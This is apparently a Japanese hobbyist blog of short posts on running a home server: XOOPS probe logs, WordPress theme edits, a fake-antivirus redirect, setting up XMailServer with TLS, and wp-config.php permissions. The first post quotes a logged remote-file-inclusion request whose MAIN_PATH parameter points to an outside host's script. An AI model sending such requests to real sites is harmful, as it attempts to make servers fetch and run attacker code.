タグ: セキュリティ

XOOPS

mainfile.php狙いの不正アクセス。

　今日は，寒かった。昨日から南に見える例のお山は雪を頂いていたが，今朝は北に見える山も雪を被っていた。初雪である。まぁ，家の辺まで降ったわけではありませんが……

　ところで，12月5日にXOOPSを導入して以来，mainfile.php狙いの不正アクセスがApacheのログに多く記録されている。
mainfile.php?MAIN_PATH=http://www.all3c.com///images/mono/20100907/app/functions/response.txt?
mainfile.php?id
なんちゃらで，libwww-perlを利用したものである。自鯖にはmainfile.phpはないので，すべて404エラーになっている。@PAGESのほうではまだアクセスログを見ていないので分からないが，やっぱりmainfile.phpは有名な名前なんだね。

　MoovableTypeでも，WordPressでもコンフィグを狙うアクセスは多いけど，有名どころのアプリをそのままの名で設置するときは，指示されているセキュリティ関係のオプションはきっちりやらないと危ないよ。

　ところで，aguse.jp越えで h ttp://www.all3c.com///images/mono/20100907/app/functions/response.txt? にアクセスしたら，右の画像が表示された。カスペルスキー，えらい。

タグ .htaccess, CMS, spam, セキュリティ

WordPress

覚え書-#2。

　備忘のために雑記をチョコチョコと。

　右の画像で，タグの「TroubleShooting」という文字がサイドバー領域からはみ出しているのがわかるだろうか。これが気になっていたのだが，テンプレートのことがよく分かっていないので放っておいた。しかし，やはり気になるので調べて見たら，category-template.php内でwp_tag_cloudというfunctionを定義していることが分かった。で，ここのlargestを22ptから18ptに変更した。

　同様に，これも右の画像に表示されているが，WordPressのトップページにはデフォルトで(なんだと思う。少し名の違うときもあるが，いろいろなテーマに入っているので。)「紹介」というリンクがあって，サイトの説明をするページに跳ぶようになっているのだが，初めから目ざわりだったのでこの機会に消すことにした。
　toppagemenu.phpから，以下の部分を削除。
　　<ul id=”nav”>
　　<!– Remove these comment-outs if you want a home button –>
　　<!– showing the blog page. –>
　　<!– Otherwise, set the home button using the –>
　　<!– Settings/Readings/Front Page Displays options –>
　　<!– remove for home button
　　<li><a href=”<?php bloginfo(‘url’);?>” title=”home”>Home</a></li>
　　remove for home button –>
　　<?php wp_list_pages(‘title_li=’); ?>
　　</ul>

　上記部分を削除したら，とばっちりでカレンダー部分のセンタリングが消えてしまったので，style.cssの以下を変更。
　　div#toppagemenu{
　　width: 1001px;
　　height: 22px;
　　background: #000;
　　text-align: left;　　　<<<———— centerに変更。
　　}

　前々項の「セキュリティツール」がらみだが，久しぶりに「Malwarebytes’ Anti-Malware」でフルスキャンしてみたら，今回はデフォルトのままだと，途中でエラーが起きて落ちる。で，エラーメッセージでdrwtsn32.exeがからんでくる。Malwarebytesのスキャン設定からヒューリスティックのチェックを外してやったら無事通ったけど，単なるバグか，どちらかに含みがあるのか。近頃，どうも疑い深くっていけない(苦笑)。

　ところで，月例分のパッチ出ましたね。もう当てました？今回，うちは今のところ何の問題も起きていません。

タグ CMS, TroubleShooting, セキュリティ, テーマ

WordPress

偽セキュリティソフト「Security Tool」について

投稿アップデート情報　　追記・追記２(10/12)　　追記３(2013/8/15)

　感染はしなかったが，この間TODOSで書いたばかりのこれらしきものに遭遇した。

　実は，SimilarPostsの日本語化があのままになっているので痺れを切らせて，日本語化したものをアップしてしまおうと思って，しかし，Robに無断はまずいだろうと彼のサイト(http://rmarsh.com/plugins/similar-posts/)に出かけたら，右のようなサイトにリダイレクトされて脅された。脅されたというのは比喩だが，ギクッとしたもんね。

　すぐに，ネットを切ってPC内をスキャンしたが，私が分かっているClamAV関係のウィルス以外は見つからなかったし，「Security Tool」に感染している痕跡もなかった。

投稿アップデート情報　　追記・追記２(10/12)　　追記３(2013/8/15)

　しかし，Robのところからというのが怖いです。昨今はまともなサイトでも安心はできないということを身をもって体験したわけで。ブラウザのJava Scriptと画像の表示を切ってアクセスしたら大丈夫だった。けど，Robのところに行くときにそんなことして行かないもんなぁ。

　「Wait a minute! This is important – we check your device」というメッセージが出るんだが，ググっても日本語ページは見つからなかった。あちらではもうとっくによく流行っているのか，ここなどいくつかが見つかった。まぁ，Robのところもあちらですからね。

追記：
　昨日，アップしたばかりの記事なんだけど早速検索ワードでここに来る方がいらっしゃいます。
　で，あの後ちょっとググッて見たけど，結構流行っているみたいですね。ウイルスバスターはすり抜けますという報告も多いようですが，うちはバスターです。もっとも，SpyBotS&DとSpywareBlasterも入ってます。Winのパッチもすべてあたっています。サーバ関係もいろいろ。いずれも最新です。
　まぁ，Winのパッチは数が多いので，いろいろバッティングして不具合の起こることもあり当てるときは注意を重ねていますが，それでも時々アチャッと言うことがあります。(月例)分は2010年10月13日のセキュリティリリース予定らしいけど，結構いろいろありますし緊急が４個もありまっせ。
　MSの緊急，重要，警告，注意 (https://technet.microsoft.com/ja-jp/security/gg309177.aspx#EBB) の使い分けはご存知ですか？知らないという場合は，リンクを見てください。

追記２：
　今朝(12日)，Robから返事が来た。簡単なやつ。
「ありがとう！どうやら，サイトは復旧できたと思う。」
　で，折り返しどんな状況だったのか聞いてみたら，ここ（魚拓です）を読んでくれと返事が来た。<<----- リンク切れが起きていたので，貼り直し。元記事と少し変わっているような気がする。（2011.Dec.8）
　ずーっと読んでいくと，案の定サーバのセキュリティレベルでハッキングされるかされないかが決まるので，各自ができることはあまりないと書いてある。ただ，ファイルが書き換えられたときには知らせてくれるプラグインがあるので，それをインストールして監視するといいそうだ。
　私の場合は，AntiVirusを入れてあるのでこれがいいのかも知れない。

追記３(2013/8/15)：
　「Similar Posts」のサポートが止まって長いので， Yet Another Related Posts Plugin を使うことにした。こちらには，はじめから日本語化ファイル（プラグイン作者自作）が付いている。どうも日系の方みたい。

タグ CMS, plugin, TroubleShooting, Vulnerability, セキュリティ

everyday life

ArgoSoft MailServer(Freeware)からXMailServerへ。

投稿者作成者: o6asan
投稿日 2010年9月14日
ArgoSoft MailServer(Freeware)からXMailServerへ。へのコメントはまだありません

投稿アップデート情報　　追記３(2011/6/24)

　前々から本家のメールサーバを変えたいと思っていた。
　現在使っているArgoSoft MailServer(Freeware)は過去においては優れものだったのだが，すでに更新が止まっているのでだんだん時代遅れになってきている。
　時代遅れということはセキュリティ面で不安が増えてくるということである。昨夜(9/13)もRequested POP3 connection from 188.134.72.25 がすごい勢いであった。一度も成功はしていないのだが，ArgoSoft MailServer(Freeware)の場合，これに対する対策があまりない。Passwordが一致しないことで弾いているだけである。もうちょっと何とかしたい。SSL/TLSや25番ポートブロックのお勉強もやってみたいし……

　というわけで，今回XMailServerの導入に挑戦してみることにした。

http://www.xmailserver.org/xmail-1.27.win32bin.zip からxmail-1.27.win32bin.zipをダウンロード。解凍する。
http://www.xmailserver.jp/download/xmailL/files/XMail127r1.zip からXMail127r1.zipをダウンロード。解凍する。
2.でできたフォルダの中身
CtrlClnt.exe
MkUsers.exe
SendMail.exe
XMail.exe
XMCrypt.exe
を，そっくり1.でできたバイナリファイルに上書きする。
フォルダ名をxmail-1.27からxmailにリネームし，Perlフォルダと同じ階層に移動する。http://xmail.dojo.jp/documentation/によれば「インストールフォルダは、そこまでのどの上位フォルダ名にも空白を含まない場所を選択することをすすめます。たとえば、\Program Files\xmail というような場所は避けてください。」ということなので，MS-Win使いは注意を要する。
http://www.xmailserver.jp/download/XMailCFG/files/XMailCFG238.zip からXMailCFG238.zipをダウンロード。解凍する。
5.でできたフォルダXMailCFG238をXMailCFGにリネームし，Apacheがアクセスできるディレクトリに移動する。http://xmail.dojo.jp/documentation/xmailcfg/help/apache.htmlを参考にXMailCFGのPerlスクリプトを実行できるように環境を適切に変更する。他のcgi同様XMailCFG内のファイルにも他のユーザがアクセスできないように十分注意して設定すること。
XMailCFG内のすべての.cgiファイルの１行めを自鯖の環境に合わせて書き直す。http://localhost/XMailCFG/index.htmlにアクセスして，基本セットアップを行う。
XMailCFG 環境設定
レジストリの登録
サービスの登録
基本セキュリティ
SMTP リレー許可
のあと，先に「SSL/TLS の管理」から自鯖メールでSSL/TLSを利用するため，私的運用環境のセットアップを行う。
XMail 環境設定に行って，
■基本設定　から，以下を自鯖の環境に合わせる。
ルートドメイン (RootDomain) *
POPデフォルトドメイン (POP3Domain) *
ポストマスターアドレス (PostMaster) *
SMTPハロードメイン (HeloDomain) *
SMTPサーバドメイン (SmtpServerDomain) *
■SSL/TLS 関連設定　から以下の３つを有効に変更する。
CTRL TLS をサポートする (EnableCTRL-TLS) 有効
POP3 TLS をサポートする (EnablePOP3-TLS) 有効
SMTP TLS をサポートする (EnableSMTP-TLS) 有効
■SMTP認証関連設定(グローバル環境)
認証済みユーザの権限 (DefaultSmtpPerms) R (リレー制限をバイパス)のチェックをはずす
以上で，上書き保存。
ドメインの管理からドメインを追加。
セキュリティ→ウイルススキャンを設定。
C:\Program Files\Trend Micro\Virus Buster\TisScan.exe
でいいのかな。
ユーザの管理からユーザを追加。自鯖メールを使うのは，イントラからしか許可しないので，デフォルトのうち，R (リレー制限をバイパス)のチェックをはずす。これで，「SMTP リレー許可」での設定が生きてくる。
クライアント機からメールを送受信してみる。うん，一応O.K.のようだ。XMailServerはいろいろな設定ができるようだが，ひとまず，Port: 995とPort: 465でアクセスできたので，満足。
不正なPOP3 connectionに対する対応のやり方は今後の学習だのみだね。(笑)

　仕事じゃないと，こんな面倒なこともやるのにと，自分に呆れてしまう。けど，弁解すると，思ったほど大変じゃなかったんだよぉ。

　SSL/TLS サービスのために私的証明書をつくったんだけど，これがね。昨日，送受信したときにクライアントメーラに証明書を受け入れさせてうまくやれたんだけど，今日やってみたら出来ない。
　結局，証明書をメーラに記憶させておくんじゃなくて一回一回暫定的に認証させないとだめみたいなんだ。ちょっと，うざいけど仕方ないね。公的証明書を使うほどのものではないから。

　サーバがWindowsなのでシステム再起動の機会が多いのだが，そのたびにサービスがこけてる模様で，手動での「サービス停止」「サービス起動」を怠ると，メールにアクセスができない。手動での起動を忘れなければいいんだが，結構うっかり忘れるので不便。なんかいい手はあるのかな？

　アクセス非許可クライアントへの対応方法
(SMTP-IpMapDropCode) 直ちに切断に変更。

タグセキュリティ

WordPress

wp-config.phpについて。

セキュリティホール memoさんによれば，Network SolutionsにホスティングしているWordPressBLOGがらみで大規模なハッキングがあったらしい。

まぁ，こちらと関係が生じるかどうかはわからないけれど，前から気になっていたwp-config.phpの

/** MySQL のユーザー名 */
define(‘DB_USER’, ‘hogehoge’);
/** MySQL のパスワード */
define(‘DB_PASSWORD’, ‘passpass’);

関係のことだったので，wp-config.phpのパーミッションということでググッてみた。

こんなのがありました。
「wp-config.phpのパーミッションは何にしておくのがベストでしょうか？」
なるほどなぁとうなずけるところがあったので，パーミッションを404に変えておきました。

というお話です。

MySQLのほうのお話はもちろんこれだけでは解決にはなりませんが……

追記：4/17(土)
ToyParkのサーバはSuExecで動いているはずなので，大丈夫ということなのかな?
Secure File Permissions Matter

タグ CMS, Vulnerability, セキュリティ